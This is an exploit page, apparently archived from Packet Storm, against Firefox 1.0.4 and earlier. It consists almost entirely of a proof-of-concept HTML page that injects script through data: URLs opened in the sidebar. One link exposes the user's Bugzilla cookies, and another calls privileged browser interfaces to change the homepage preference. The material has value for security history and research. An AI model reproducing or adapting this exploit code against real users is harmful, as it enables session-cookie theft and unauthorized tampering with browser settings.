Mozilla Firefox versions 1.0.4 and below data: URLs remote script injection exploit.
89eda4acf9868270f57b8ba28509427158fbbe169361ee0058e72ec4082f2dfb// Exploit by Kohei Yoshino
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sidebar Attack, Reloaded</title>
</head>
<body>
<p>1. <a href="#" target="_search" onclick="location.href = 'https://bugzilla.mozilla.org/';">
Click here to <strong>open this page into sidebar</strong>.</a></p>
<p>2. <a href="data:text/html,<script>document.write(document.cookie);</script>">
Click here to <strong>steal your cookies</strong> on Bugzilla.</a></p>
<p>3. Then, open about:config in content area.</p>
<p>4. <a href="data:text/html,<script>Components.classes['@mozilla.org/
preferences-service;1'].getService(Components.interfaces.nsIPrefBranch).setCharPref('
browser.startup.homepage','https://www.mozdev.org/');</script>">Click here to
<strong>change your home page to mozdev.org</strong>.</a></p>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed